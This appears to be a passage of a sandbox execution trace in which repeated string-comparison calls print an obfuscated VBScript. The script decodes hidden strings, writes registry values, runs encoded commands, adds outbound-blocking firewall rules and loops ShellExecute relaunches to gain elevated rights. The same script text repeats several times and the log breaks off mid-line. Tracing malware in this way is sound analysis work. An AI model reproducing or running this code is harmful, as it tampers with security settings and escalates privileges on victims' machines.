bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.935] wcsncmp (_String1="x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107 [0222.935] wcsncmp (_String1=", x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0222.935] wcsncmp (_String1=" x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.935] wcsncmp (_String1="x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite 